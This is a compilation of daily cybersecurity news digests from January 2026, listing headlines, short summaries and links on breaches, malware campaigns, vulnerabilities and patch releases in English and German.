https://www.derstandard.at/story/3000000303975/instagram-dementiert-hack-nach-massenhaften-passwort-reset-mails

Ransomware: Tactical Evolution Fuels Extortion Epidemic

New whitepaper reveals record number of attacks as threat landscape evolves with new players and new tactics.

https://www.security.com/threat-intelligence/ransomware-extortion-epidemic

More than 40 countries impacted by North Korea IT worker scams, crypto thefts

Eleven countries led a session at the UN headquarters in New York centered around a 140-page report released last fall that covered North Korea-s extensive cyber-focused efforts to fund its nuclear and ballistic weapons program.

https://therecord.media/40-countries-impacted-nk-it-thefts-united-nations

Poland says it repelled major cyberattack on power grid, blames Russia

Poland narrowly avoided a large-scale power outage by thwarting what officials described as the most serious cyberattack on its energy infrastructure in years.

https://therecord.media/poland-cyberattack-grid-russia

Western cyber agencies warn about threats to industrial operational technology

New guidance issued by Britain-s National Cyber Secure Centre (NCSC), a part of signals and cyber intelligence agency GCHQ, sets out how organizations should securely connect equipment such as industrial control systems, sensors and other critical services.

https://therecord.media/cyber-agencies-warn-of-industrial-system-threats

Telegram to Add Warning for Proxy Links After IP Leak Concerns

Telegram will add a warning for proxy links after reports showed they can expose user IP addresses with a single click, bypassing VPN or privacy settings.

https://hackread.com/telegram-add-warning-proxy-links-ip-leak/

Hacker Claims Full Breach of Russia-s Max Messenger, Threatens Public Leak

A hacker claims a full breach of Russia-s Max Messenger, threatening to leak user data and backend systems if demands are not met.

https://hackread.com/hacker-russia-max-messenger-breach-data-leak/

Secure Connectivity Principles for Operational Technology (OT)

CISA and the UK National Cyber Security Centre (NCSC-UK), in collaboration with federal and international partners, have released Secure Connectivity Principles for Operational Technology (OT) guidance to help asset owners address increasing business and regulatory pressures for connectivity into operational technology (OT) networks.

https://www.cisa.gov/resources-tools/resources/secure-connectivity-principles-operational-technology-ot

Unpatchable Vulnerabilities of Kubernetes: CVE-2020-8554

This blog is the first part of a mini-series looking at the four unpatchable CVEs in every Kubernetes cluster.

https://securitylabs.datadoghq.com/articles/unpatchable-kubernetes-vulnerabilities-cve-2020-8554/

Wireless-(in)Fidelity: Pentesting Wi-Fi in 2025

Despite the advancements that have been made in Wi-Fi security with the arrival of WPA3, some misconfigurations and legacy protocols still remain. In this blogpost, we share insights into Wi-Fi related findings encountered during penetration testing engagements.

https://www.synacktiv.com/en/publications/wireless-infidelity-pentesting-wi-fi-in-2025.html

Vulnerabilities

Multiple vulnerabilities in EATON UPS Companion

EATON UPS Companion provided by Eaton contains multiple vulnerabilities.

https://jvn.jp/en/jp/JVN48187396/

Patchday Microsoft: Attacken auf Windows und Windows Server beobachtet

Es sind wichtige Sicherheitsupdates für Office, Windows & Co. erschienen. Angreifer nutzen bereits eine Lücke aus. Weitere Attacken können bevorstehen.

https://www.heise.de/news/Patchday-Microsoft-Angreifer-spionieren-Speicherbereiche-in-Windows-aus-11140152.html

Patchday Adobe: Schadcode-Lücken bedrohen Dreamweaver & Co.

Wichtige Sicherheitsupdates reparieren unter anderem Adobe ColdFusion und InDesign.

https://www.heise.de/news/Patchday-Adobe-Schadcode-Luecken-bedrohen-Dreamweaver-Co-11140224.html

Security updates for Wednesday

Security updates have been issued by AlmaLinux (sssd), Debian (linux-6.1 and python-parsl), Fedora (chezmoi, complyctl, composer, and firefox), Oracle (kernel), Red Hat (buildah, libpq, podman, postgresql, postgresql16, postgresql:13, postgresql:15, and postgresql:16), SUSE (avahi, curl, ffmpeg-4, ffmpeg-7, firefox, istioctl, k6, kubelogin, libmicrohttpd, libpcap-devel, libpng16, libtasn1-6-32bit, matio, ovmf, python-tornado6, python311-Authlib, and teleport), and Ubuntu (angular.js, python-urllib3, and webkit2gtk).

https://lwn.net/Articles/1054167/

Mitigating Denial-of-Service Vulnerability from Unrecoverable Stack Space Exhaustion for React, Next.js, and APM Users

This bug highlights how deeply async_hooks has become embedded in the Node.js ecosystem. What started as a low-level debugging API is now a critical dependency for React Server Components, Next.js, every major APM tool, and any code using AsyncLocalStorage.

https://nodejs.org/en/blog/vulnerability/january-2026-dos-mitigation-async-hooks

F5: K000159546, Python vulnerability CVE-2024-5642

https://my.f5.com/manage/s/article/K000159546

Tageszusammenfassung - 13.01.2026

2026-01-13T18:50:40Z

End-of-Day report

Timeframe: Montag 12-01-2026 18:00 - Dienstag 13-01-2026 18:00 Handler: Felician Fuchs Co-Handler: n/a

News

Targets dev server offline after hackers claim to steal source code

Hackers are claiming to be selling internal source code belonging to Target Corporation, after publishing what appears to be a sample of stolen code repositories on a public software development platform. After BleepingComputer notified Target, the files were taken offline and the retailers developer Git server was inaccessible.

https://www.bleepingcomputer.com/news/security/targets-dev-server-offline-after-hackers-claim-to-steal-source-code/

CISA orders feds to patch Gogs RCE flaw exploited in zero-day attacks

CISA has ordered government agencies to secure their systems against a high-severity Gogs vulnerability that was exploited in zero-day attacks.

https://www.bleepingcomputer.com/news/security/cisa-orders-feds-to-patch-gogs-rce-flaw-exploited-in-zero-day-attacks/

Facebook login thieves now using browser-in-browser trick

Hackers over the past six months have relied increasingly more on the browser-in-the-browser (BitB) method to trick users into providing Facebook account credentials.

https://www.bleepingcomputer.com/news/security/facebook-login-thieves-now-using-browser-in-browser-trick/

Convincing LinkedIn comment-reply tactic used in new phishing

Scammers are flooding LinkedIn posts with fake "reply" comments that appear to come from the platform, warning of bogus policy violations and urging users to click external links. Some even abuse LinkedIns official lnkd.in shortener, making the phishing attempts harder to spot.

https://www.bleepingcomputer.com/news/security/convincing-linkedin-comment-reply-tactic-used-in-new-phishing/

What we know about Iran-s Internet shutdown

Cloudflare Radar data shows Internet traffic from Iran has effectively dropped to zero since January 8, signaling a complete shutdown in the country and disconnection from the global Internet.

https://blog.cloudflare.com/iran-protests-internet-shutdown/

GoBruteforcer Botnet Targets 50K-plus Linux Servers

Researchers detailed a souped-up version of the GoBruteforcer botnet that preys on servers with weak credentials and AI-generated configurations.

https://www.darkreading.com/threat-intelligence/gobruteforcer-botnet-targets-50k-plus-linux-servers

10-Punkte-Papier: BDEW fordert Maßnahmen zum Schutz kritischer Infrastruktur

In einem Positionspapier fordert der Bundesverband der Energie- und Wasserwirtschaft die Stärkung der Resilienz kritischer Infrastrukturen.

https://www.golem.de/news/10-punkte-papier-bdew-fordert-massnahmen-zum-schutz-kritischer-infrastruktur-2601-204140.html

n8n Supply Chain Attack Abuses Community Nodes to Steal OAuth Tokens

Threat actors have been observed uploading a set of eight packages on the npm registry that masqueraded as integrations targeting the n8n workflow automation platform to steal developers OAuth credentials.

https://thehackernews.com/2026/01/n8n-supply-chain-attack-abuses.html

New Malware Campaign Delivers Remcos RAT Through Multi-Stage Windows Attack

Cybersecurity researchers have disclosed details of a new campaign dubbed SHADOW#REACTOR that employs an evasive multi-stage attack chain to deliver a commercially available remote administration tool called Remcos RAT and establish persistent, covert remote access.

https://thehackernews.com/2026/01/new-malware-campaign-delivers-remcos.html

New Advanced Linux VoidLink Malware Targets Cloud and container Environments

Cybersecurity researchers have disclosed details of a previously undocumented and feature-rich malware framework codenamed VoidLink thats specifically designed for long-term, stealthy access to Linux-based cloud environments.

https://thehackernews.com/2026/01/new-advanced-linux-voidlink-malware.html

Businesses in 2026: Maybe we should finally look into that AI security stuff

Survey finds security checks nearly doubled in a year as leaders wise up. The number of organizations that have implemented methods for identifying security risks in the AI tools they use has almost doubled in the space of a year.

https://www.theregister.com/2026/01/12/ai_security_wef_survey/

Mandiant open sources tool to prevent leaky Salesforce misconfigs

AuraInspector automates the most common abuses and generates fixes for customers Mandiant has released an open source tool to help Salesforce admins detect misconfigurations that could expose sensitive data.

https://www.theregister.com/2026/01/13/mandiant_salesforce_tool/

Dutch cops cuff alleged AVCheck malware kingpin in Amsterdam

33-year-old was under surveillance for some time before returning home from the UAE Dutch police believe they have arrested a man behind the AVCheck online platform - a service used by cybercrims that Operation Endgame shuttered in May.

https://www.theregister.com/2026/01/13/avcheck_arrest/

Start der ersten ESC-Ticketwelle: Vorsicht vor unseriösen Angeboten!

Endlich ist es so weit: Der Vorverkauf für den Eurovision Song Contest 2026 hat begonnen! Doch Fans sollten besonders vorsichtig sein, denn unseriöse Anbieter versuchen, außerhalb der offiziellen Verkaufsplattformen Profit zu schlagen.

https://www.watchlist-internet.at/news/start-der-ersten-esc-ticketwelle-vorsicht-vor-unserioesen-angeboten/

Neue Phishing-Welle: Ausstehende Zahlungen ans Finanzamt

Einmal mehr geben sich Kriminelle als das Bundesministerium für Finanzen aus. Aktuell nehmen sie sowohl Privatpersonen als auch Unternehmen ins Visier. In beiden Fällen sollen angeblich offene Zahlungen mit einer Überweisung beglichen werden - auf ein Konto im Ausland.

https://www.watchlist-internet.at/news/phishing-ausstehende-zahlungen-finanzamt/

Latin America Sees Sharpest Rise in Cyber Attacks in December 2025 as Ransomware Activity Accelerates

In December 2025, organizations experienced an average of 2,027 cyber attacks per organization per week. This represents a 1% month-over-month increase and a 9% year-over-year increase. While overall growth remained moderate, Latin America recorded the sharpest regional increase, with organizations experiencing an average of 3,065 attacks per week, a 26% increase year over year.

https://blog.checkpoint.com/research/latin-america-sees-sharpest-rise-in-cyber-attacks-in-december-2025-as-ransomware-activity-accelerates/

VoidLink: The Cloud-Native Malware Framework Weaponizing Linux Infrastructure

Key Points: VoidLink is a cloud-native Linux malware framework built to maintain long-term, stealthy access to cloud infrastructure rather than targeting individual endpoints. It reflects a shift in attacker focus away from Windows systems toward the Linux environments that power cloud services and critical operations. Its modular, plug-in-driven design allows threat actors to customize capabilities over time, expanding attacks quietly as objectives evolve.

https://blog.checkpoint.com/research/voidlink-the-cloud-native-malware-framework-weaponizing-linux-infrastructure/

Sweden detains ex-military IT consultant suspected of spying for Russia

A 33-year-old former IT consultant for Sweden-s Armed Forces has been detained on suspicions of spying for Russian intelligence, Swedish prosecutors said.

https://therecord.media/sweden-detains-it-consultant-russia

0patch Micropatch für CredSSP-Schwachstelle CVE-2025-47987

Noch ein kleiner Nachtrag von letzter Woche und vor dem Januar 2026 Patchday. ACROS Security hat einen 0patch Micropatch für eine Elevation of Privilege (EoP)-Schwachstelle CVE-2025-47987 im Credential Security Support Provider Protocol (CredSSP) veröffentlicht.

https://borncity.com/blog/2026/01/13/0patch-micropatch-fuer-credssp-schwachstelle-cve-2025-47987/

End of Support für Microsoft-Produkte in 2026

Das Jahr 2026 bringt für Nutzer von Microsoft Produkten einige Termine, an denen der Support endet. Das reicht von diversen Windows-Versionen, die dann nicht mehr durch Updates unterstützt werden, bis hin zu Microsoft Office 2021.

https://borncity.com/blog/2026/01/13/end-of-support-fuer-microsoft-produkte-in-2026/

Russian BlueDelta (Fancy Bear) Uses PDFs to Steal Logins in Just 2 Seconds

New research from Recorded Future reveals how Russian state hackers (BlueDelta) are using fake Microsoft and Google login portals to steal credentials. The campaign involves using legitimate PDF lures from GRC and EcoClimate to trick victims.

https://hackread.com/russian-bluedelta-fancy-bear-pdfs-steal-login/

Widespread Magecart Campaign Targets Users of All Major Credit Cards

Researchers at Silent Push have exposed a global Magecart campaign stealing credit card data since 2022. Learn how this invisible web-skimming attack targets major networks like Mastercard and Amex, and how to stay safe.

https://hackread.com/magecart-targets-all-credit-cards-users/

K7 Antivirus: Named pipe abuse, registry manipulation and privilege escalation (CVE-2025-67826)

When hunting for privilege escalation vulnerabilities, named pipes are a goldmine. Antivirus products often use named pipes to allow unprivileged users to trigger privileged operations, making them especially promising targets for this class of vulnerability.

http://blog.quarkslab.com/k7-antivirus-named-pipe-abuse-registry-manipulation-and-privilege-escalation.html

How GitHub could secure npm

In 2025, npm experienced an unprecedented number of compromised packages in a series of coordinated attacks on the JavaScript open source supply chain. These packages ranged from crypto-stealing malware1 to credential-stealing exploits2. While GitHub announced changes3 to address these attacks, many maintainers (myself included) found the response insufficient.

https://humanwhocodes.com/blog/2026/01/how-github-could-secure-npm/

Shai Hulud 2.0 Campaign

Shai-Hulud 2.0 represents one of the most severe supply chain compromises observed in the modern cloud-native ecosystem. The campaign involved the manipulation of hundreds of publicly available packages and specifically targeted developer workstations, CI/CD pipelines, and cloud workloads to harvest credentials and sensitive configuration data.

https://detect.fyi/shai-hulud-2-0-campaign-be390e502f28?source=rssd5fd8f494f6a4

Malicious Chrome Extension Steals MEXC API Keys for Account Takeover

Socket-s Threat Research Team identified a malicious Chrome extension, MEXC API Automator, published to the Chrome Web Store on September 1, 2025, by a threat actor under the alias jorjortan142.

https://socket.dev/blog/malicious-chrome-extension-steals-mexc-api-keys?utm_medium=feed

Fixing ESC1 - Enrollee supplies subject and template allows client authentication

ADCS misconfigurations are one of the most common privilege escalation vectors we encounter. This article covers steps to remediate ESC1 flaws.

https://projectblack.io/blog/fixing-esc1-enrollee-supplies-subject-and-template-allows-client-authentication/

Lack of isolation in agentic browsers resurfaces old vulnerabilities

With browser-embedded AI agents, we-re essentially starting the security journey over again. We exploited a lack of isolation mechanisms in multiple agentic browsers to perform attacks ranging from the dissemination of false information to cross-site data leaks.

https://blog.trailofbits.com/2026/01/13/lack-of-isolation-in-agentic-browsers-resurfaces-old-vulnerabilities/

Vulnerabilities

Unauthenticated access to local configuration

CVSSv3 Score: 9.3. An exposure of sensitive information to an unauthorized actor [CWE-200] vulnerability in FortiFone Web Portal page may allow an unauthenticated attacker to obtain the device configuration via crafted HTTP or HTTPS requests.

https://fortiguard.fortinet.com/psirt/FG-IR-25-260

Unauthenticated remote command injection

CVSSv3 Score: 9.4. An improper neutralization of special elements used in an OS command (OS Command Injection) vulnerability [CWE-78] in FortiSIEM may allow an unauthenticated attacker to execute unauthorized code or commands via crafted TCP requests.

https://fortiguard.fortinet.com/psirt/FG-IR-25-772

SAP Security Patch Day January 2026

SAP has released its January 2026 security patch package containing 17 security notes addressing critical vulnerabilities across enterprise SAP environments. This release includes four HotNews vulnerabilities with CVSS ratings up to 9.9, four High priority issues, seven Medium priority fixes, and two Low priority updates. The patches affect SAP S/4HANA, SAP HANA database, SAP NetWeaver, SAP Wily Introscope, and various application components.

https://redrays.io/blog/sap-security-patch-day-january-2026/

TinyWeb: Windows-Web-Server ermöglicht Codeschmuggel

In dem schlanken Web-Server TinyWeb für Windows können Angreifer aus dem Netz beliebigen Code einschleusen. Ein Update hilft.

https://www.heise.de/news/TinyWeb-Windows-Web-Server-ermoeglicht-Codeschmuggel-11138924.html

TYPO3-CORE-SA-2026-003: Broken Access Control in Recycler Module

It has been discovered that TYPO3 CMS is susceptible to broken access control.

https://typo3.org/security/advisory/typo3-core-sa-2026-003

ServiceNow Patches Critical AI Platform Flaw Allowing Unauthenticated User Impersonation

ServiceNow has disclosed details of a now-patched critical security flaw impacting its ServiceNow AI Platform that could enable an unauthenticated user to impersonate another user and perform arbitrary actions as that user. The vulnerability, tracked as CVE-2025-12420, carries a CVSS score of 9.3 out of 10.0.

https://thehackernews.com/2026/01/servicenow-patches-critical-ai-platform.html

Security updates for Tuesday

Security updates have been issued by AlmaLinux (mariadb10.11, mariadb:10.11, mariadb:10.3, mariadb:10.5, and tar), Debian (net-snmp), Fedora (coturn, NetworkManager-l2tp, openssh, and tuxanci), Mageia (libtasn1), Oracle (buildah, cups, httpd, kernel, libpq, libsoup, libsoup3, mariadb:10.11, mariadb:10.3, openssl, and podman), SUSE (cpp-httplib, ImageMagick, libtasn1, python-cbor2, util-linux, valkey, and wget2), and Ubuntu (google-guest-agent, linux-iot, and python-urllib3).

https://lwn.net/Articles/1053988/

Remote Code Execution With Modern AI/ML Formats and Libraries

We identified remote code execution vulnerabilities in open-source AI/ML libraries published by Apple, Salesforce and NVIDIA.

https://unit42.paloaltonetworks.com/rce-vulnerabilities-in-ai-python-libraries/

YoSmart YoLink Smart Hub

https://www.cisa.gov/news-events/ics-advisories/icsa-26-013-03

Rockwell Automation FactoryTalk DataMosaix Private Cloud

https://www.cisa.gov/news-events/ics-advisories/icsa-26-013-02

Rockwell Automation 432ES-IG3 Series A

https://www.cisa.gov/news-events/ics-advisories/icsa-26-013-01

Security Vulnerabilities fixed in Firefox 147

https://www.mozilla.org/en-US/security/advisories/mfsa2026-01/

Tageszusammenfassung - 12.01.2026

2026-01-12T18:25:46Z

End-of-Day report

Timeframe: Freitag 09-01-2026 18:00 - Montag 12-01-2026 18:00 Handler: Felician Fuchs Co-Handler: Alexander Riepl

News

Max severity Ni8mare flaw impacts nearly 60,000 n8n instances

Nearly 60,000 n8n instances exposed online remain unpatched against a maximum-severity vulnerability dubbed "Ni8mare."

https://www.bleepingcomputer.com/news/security/max-severity-ni8mare-flaw-impacts-nearly-60-000-n8n-instances/

Spanish energy giant Endesa discloses data breach affecting customers

Spanish energy provider Endesa and its Energía XXI operator are notifying customers that hackers accessed the companys systems and accessed contract-related information, which includes personal details.

https://www.bleepingcomputer.com/news/security/spanish-energy-giant-endesa-discloses-data-breach-affecting-customers/

Hidden Telegram proxy links can reveal your IP address in one click

A single click on what may appear to be a Telegram username or harmless link is all it takes to expose your real IP address to attackers due to how proxy links are handled. Telegram says it will add warnings to proxy links after researchers demonstrated that such one-click interactions could reveal a Telegram users real IP address.

https://www.bleepingcomputer.com/news/security/hidden-telegram-proxy-links-can-reveal-your-ip-address-in-one-click/

Illicit Crypto Economy Surges Amid Increased Nation-State Activity

Cybercriminal cryptocurrency transactions totaled billions in 2025, with activity from sanctioned countries like Russia and Iran causing the largest jump.

https://www.darkreading.com/cyber-risk/illicit-crypto-economy-surges-nation-states

Russia-s Fancy Bear APT Doubles Down on Global Secrets Theft

The notorious state-sponsored group relies on basic techniques that are highly effective, often delivering greater ROI than more complex malware-heavy operations.

https://www.darkreading.com/cyberattacks-data-breaches/russian-apt-credentials-global-targets

Two Separate Campaigns Target Exposed LLM Services

A total of 91,403 sessions targeted public LLM endpoints to find leaks in organizations use of AI and map an expanding attack surface.

https://www.darkreading.com/endpoint-security/separate-campaigns-target-exposed-llm-services

Cybersecurity Act: EU-Kommission will hartes Verbot von Huawei

Bisher freiwillige Beschränkungen gegen chinesische Ausrüster will die EU-Kommission nun zwangsweise umsetzen. Das ist in der EU stark umstritten und erscheint aus der Zeit gefallen.

https://www.golem.de/news/cybersecurity-act-eu-kommission-will-hartes-verbot-von-huawei-2601-204031.html

Lohnabrechnungen falsch verschickt: DSGVO-Vorfall bei der Datev

Nach einer technischen Störung bei der Datev-Lohnabrechnung sind Kundendaten in falsche Hände gelangt. Auslöser war ausgerechnet ein Problemlösungsversuch.

https://www.golem.de/news/lohnabrechnungen-falsch-verschickt-dsgvo-vorfall-bei-der-datev-2601-204034.html

Researchers Uncover Service Providers Fueling Industrial-Scale Pig Butchering Fraud

Cybersecurity researchers have shed light on two service providers that supply online criminal networks with the necessary tools and infrastructure to fuel the pig butchering-as-a-service (PBaaS) economy.

https://thehackernews.com/2026/01/researchers-uncover-service-providers.html

GoBruteforcer Botnet Targets Crypto Project Databases by Exploiting Weak Credentials

A new wave of GoBruteforcer attacks has targeted databases of cryptocurrency and blockchain projects to co-opt them into a botnet thats capable of brute-forcing user passwords for services such as FTP, MySQL, PostgreSQL, and phpMyAdmin on Linux servers.

https://thehackernews.com/2026/01/gobruteforcer-botnet-targets-crypto.html

UK government exempting itself from flagship cyber law inspires little confidence

Ministers promise equivalent standards just without the legal obligation ANALYSIS From Mays cyberattack on the Legal Aid Agency to the Foreign Office breach months later, cyber incidents have become increasingly common in UK government.

https://www.theregister.com/2026/01/10/csr_bill_analysis/

Instagram-Datenleck: Daten von 6,2 Millionen Konten bei Have-I-Been-Pwned

Daten von 6,2 Millionen Instagram-Nutzern sind beim Have-I-Been-Pwned-Projekt gelandet.

https://www.heise.de/news/Instagram-6-2-Millionen-Nutzerdaten-mittels-Scraping-abgegriffen-11137222.html

ÖIAT-Schwerpunkterhebung deckt auf: Massive Präsenz von Abo-Fallen in Google-Anzeigen

Bei einer eingehenden Analyse der Google Werbebibliothek entdeckte das Österreichische Institut für angewandte Telekommunikation (ÖIAT) eine große Menge an gefährlichen Ads. Insgesamt waren es weit über 27.000 problematische Werbeanzeigen, die als Köder für Abo-Fallen dienten. Auf Beschwerden reagierte Google bisher nicht.

https://www.watchlist-internet.at/news/schwerpunkterhebung-abo-fallen-google/

Basketball player arrested for alleged ransomware ties freed in Russia-France prisoner swap

Daniil Kasatkin, 26, was seen in a video shared by Russian state news outlet TASS emerging from a plane that was then used to send French researcher Laurent Vinatier back to France.

https://therecord.media/france-frees-russian-basketball-player-ransomware-swap

MC1215070: MFA für Microsoft 365 Admin Center ab Feb. 2026 Pflicht

Noch eine kurze Information für Administratoren von Microsoft 365-Tenants. Microsoft erzwingt aus Sicherheitsgründen ab dem 9. Februar 2026 eine Multifaktor-Authentifizierung (MFA) zur Administratoranmeldung am Microsoft 365 Admin Center. Ohne entsprechende Maßnahmen scheitert dann die Anmeldung.

https://borncity.com/blog/2026/01/11/mc1215070-mfa-fuer-microsoft-365-admin-center-kuenftig-pflicht/

Database of 323,986 BreachForums Users Leaked as Admin Disputes Scope

Database of 323,986 BreachForums users leaked online as forum admins claim the exposed data is partial and dates back to August 2025.

https://hackread.com/breachforums-database-users-leak-admin-disputes/

Everest Ransomware Claims Breach at Nissan, Says 900GB of Data Stolen

Everest ransomware claims to have breached Nissan Motor Corporation, alleging the theft of 900GB of internal data, including documents and screenshots.

https://hackread.com/everest-ransomware-nissan-data-breach/

How Safe is the Rust Ecosystem? A Deep Dive into crates.io

The relentless wave of high-impact supply chain attacks throughout 2025-most notably the major incident within npm [..] -suggests this trend is far from peaking. In fact, with the rapid adoption of AI and LLMs in development workflows, we are likely facing an acceleration of these threats rather than a decline, in my opinion.

https://mr-leshiy-blog.web.app/blog/crates_io_analysis/

Detection of Kerberos Golden Ticket Attacks via Velociraptor

Kerberos is a strange technology. Over the years, I-ve gone through its internal workings again and again, yet parts of it always seem to slip away. It has been a while since I did my OSCP, so inevitably I-ve found myself back in this topic to refresh my knowledge.

https://detect.fyi/detection-of-kerberos-golden-ticket-attacks-via-velociraptor-cfe7cc26d3eb

Vulnerabilities

Sicherheitsupdate: Dell-Laptops mit Adreno-GPU sind verwundbar

Der Treiber von Qualcomms Adreno GPU ist löchrig und gefährdet die Sicherheit verschiedener Dell-Laptops. Ein reparierter Treiber steht zum Download bereit.

https://www.heise.de/news/Sicherheitsupdate-Dell-Laptops-mit-Adreno-GPU-sind-verwundbar-11137255.html

Security updates for Monday

Security updates have been issued by Debian (chromium and sogo), Fedora (chromium, foomuuri, libpng, libsodium, mariadb10.11, musescore, nginx, python-pdfminer, python-urllib3, python3.12, seamonkey, wasmedge, and wget2), Mageia (curl, libpcap, sodium, wget2, and zlib), Slackware (lcms2), SUSE (chromedriver, chromium, noopenh264, coredns, curl, dcmtk, fontforge, gdk-pixbuf-loader-libheif, gimp, kernel, libheif, libpng16, libsoup-2_4-1, libvirt, mariadb, php8, poppler, python-filelock, python-tornado6, python311-aiohttp, qemu, sssd, and traefik), and Ubuntu (libheif, libtasn1-6, linux-azure-nvidia, linux-kvm, linux-raspi, linux-raspi-realtime, and php7.2, php7.4, php8.1, php8.3, php8.4).

https://lwn.net/Articles/1053820/

Tageszusammenfassung - 09.01.2026

2026-01-09T18:57:52Z

End-of-Day report

Timeframe: Donnerstag 08-01-2026 18:00 - Freitag 09-01-2026 18:00 Handler: Felician Fuchs Co-Handler: n/a

News

VMware ESXi zero-days likely exploited a year before disclosure

Chinese-speaking threat actors used a compromised SonicWall VPN appliance to deliver a VMware ESXi exploit toolkit that seems to have been developed more than a year before the targeted vulnerabilities became publicly known.

https://www.bleepingcomputer.com/news/security/vmware-esxi-zero-days-likely-exploited-a-year-before-disclosure/

FBI warns about Kimsuky hackers using QR codes to phish U.S. orgs

The North Korean state-sponsored hacker group Kimsuki is using malicious QR codes in spearphishing campaigns that target U.S. organizations, the Federal Bureau of Investigation warns in a flash alert.

https://www.bleepingcomputer.com/news/security/fbi-warns-about-kimsuky-hackers-using-qr-codes-to-phish-us-orgs/

New China-linked hackers breach telcos using edge device exploits

A sophisticated threat actor that uses Linux-based malware to target telecommunications providers has recently broadened its operations to include organizations in Southeastern Europe.

https://www.bleepingcomputer.com/news/security/new-china-linked-hackers-breach-telcos-using-edge-device-exploits/

Defeating KASLR by Doing Nothing at All

I-ve recently been researching Pixel kernel exploitation and as part of this research I found myself with an excellent arbitrary write primitive-but without a KASLR leak. As necessity is the mother of all invention, on a hunch, I started researching the Linux kernel linear mapping.

https://projectzero.google/2025/11/defeating-kaslr-by-doing-nothing-at-all.html

Google Sees Spam, You See Your Site: A Cloaked SEO Spam Attack

We recently handled a case where a customer reported strange SEO behavior on their website. Regular visitors saw a normal site. No popups. No redirects. No visible spam. However, when they checked their site on Google, the search results were flooded with eBay-type-looking websites and -Situs Toto- gambling spam. This is a professional-grade SEO cloaking attack.

https://blog.sucuri.net/2026/01/google-sees-spam-you-see-your-site-a-cloaked-seo-spam-attack.html

Russian APT28 Runs Credential-Stealing Campaign Targeting Energy and Policy Organizations

Russian state-sponsored threat actors have been linked to a fresh set of credential harvesting attacks targeting individuals associated with a Turkish energy and nuclear research agency, as well as staff affiliated with a European think tank and organizations in North Macedonia and Uzbekistan.

https://thehackernews.com/2026/01/russian-apt28-runs-credential-stealing.html

Auslegungssache 150: Auf digitaler Spurensuche

Im ct-Datenschutz-Podcast erklärt eine IT-Forensikerin, wie sie nach Vorfällen Spuren sichert, mit Erpressern verhandelt und den Datenschutz im Blick behält.

https://www.heise.de/hintergrund/Auslegungssache-150-Auf-digitaler-Spurensuche-11134668.html

Von München bis Sevilla: Internationaler Schlag gegen Cyber-Mafia -Black Axe-

Ermittlern gelang in Spanien ein empfindlicher Schlag gegen die als -Black Axe- bekannte nigerianische Cyber-Mafia.

https://www.heise.de/news/Von-Muenchen-bis-Sevilla-Internationaler-Schlag-gegen-Cyber-Mafia-Black-Axe-11135925.html

Who Benefited from the Aisuru and Kimwolf Botnets?

Our first story of 2026 revealed how a destructive new botnet called Kimwolf rapidly grew to infect more than two million devices by mass-compromising a vast number of unofficial Android TV streaming boxes. Today, well dig through digital clues left behind by the hackers, network operators, and cybercrime services that appear to have benefitted from Kimwolfs spread.

https://krebsonsecurity.com/2026/01/who-benefited-from-the-aisuru-and-kimwolf-botnets/

CPPA fines data broker selling lists of Alzheimers patients

Datamasters bought and resold the names, addresses, phone numbers and email addresses of millions of people with Alzheimer-s disease, drug addiction, bladder incontinence and other medical conditions for targeted advertising, according to the CPPA.

https://therecord.media/ccpa-fines-data-broker-selling-lists-alzheimers

Russian Hacktivists hack CCTV Cameras in Denmark

The hacktivists had recorded part of the video stream from the CCTV as proof of the hack and published it. It was reported that no individuals were identifiable on the recording.

https://www.truesec.com/hub/blog/russian-hacktivists-hack-cctv-cameras-in-denmark

CISCO-Switches gehen wegen DNS-Fehler in Boot-Schleifen

Weltweit kämpfen Administratoren wohl damit, dass bestimmte Switches des Herstellers CISCO in einer Neustart-Schleife (Boot-Loop) gefangen sind. Das tritt auf, nachdem die Geräte einen DNS-Client-Fehler protokolliert haben.

https://borncity.com/blog/2026/01/09/cisco-switches-gehen-wegen-dns-fehler-in-boot-schleifen/

Hacker Behind Wired.com Leak Now Selling Full 40M Condé Nast Records

A hacker claims to be selling nearly 40 million Condé Nast user records after leaking Wired.com data, with multiple major brands allegedly affected.

https://hackread.com/wired-com-hacker-data-leak-conde-nast-records/

Threat Actors Actively Targeting LLMs

Our Ollama honeypot infrastructure captured 91,403 attack sessions between October 2025 and January 2026. Buried in that data: two distinct campaigns that reveal how threat actors are systematically mapping the expanding surface area of AI deployments.

https://www.greynoise.io/blog/threat-actors-actively-targeting-llms

Do Smart People Ever Say They-re Smart? (SmarterTools SmarterMail Pre-Auth RCE CVE-2025-52691)

Welcome to 2026! While we are all waiting for the scheduled SSLVPN ITW exploitation programming that occurs every January, we-re back from Christmas and idle hands, idle minds, yada yada. In December, we were alerted to a vulnerability in SmarterTools- SmarterMail solution, accompanied by an advisory from Singapore-s Cyber Security Agency (CSA) - CVE-2025-52691, a pre-auth RCE that obtained full marks (10/10) on the industry-s scale.

https://labs.watchtowr.com/do-smart-people-ever-say-theyre-smart-smartertools-smartermail-pre-auth-rce-cve-2025-52691/

Fake Windows Update and BSOD Alerts Used in a Tech Support Scam

While reviewing submissions received through the WordPress feedback form on my website, I came across a URL that initially appeared unremarkable. Such submissions are common and often contain benign questions or comments, but this particular link stood out enough to warrant closer inspection.

https://malwr-analysis.com/2026/01/09/fake-windows-update-and-bsod-alerts-used-in-a-tech-support-scam/

Vulnerabilities

VU#361400: BeeS Software Solutions BeeS Examination Tool (BET) portal contains SQL injection vulnerability

The BeeS Examination Tool (BET) portal from BeeS Software Solutions contains an SQL injection vulnerability in its website login functionality. More than 100 universities use the BET portal for test administration and other academic tasks.

https://kb.cert.org/vuls/id/361400

RICOH Streamline NX vulnerable to improper authorization

RICOH Streamline NX provided by Ricoh Company, Ltd. contains an improper authorization vulnerability.

https://jvn.jp/en/jp/JVN12770174/

Trend Micro Apex Central RCE Flaw Scores 9.8 CVSS in On-Prem Windows Versions

Trend Micro has released security updates to address multiple security vulnerabilities impacting on-premise versions of Apex Central for Windows, including a critical bug that could result in arbitrary code execution. The vulnerability, tracked as CVE-2025-69258, carries a CVSS score of 9.8 out of a maximum of 10.0.

https://thehackernews.com/2026/01/trend-micro-apex-central-rce-flaw.html

Mediaplayer VLC: Aktualisierte Version stopft zahlreiche Lücken

Die Version 3.0.23 des VLC Media Player bessert diverse Schwachstellen aus, die möglicherweise Unterschieben von Schadcode erlauben.

https://www.heise.de/news/VLC-stopft-diverse-Sicherheitslecks-11135921.html

Security updates for Friday

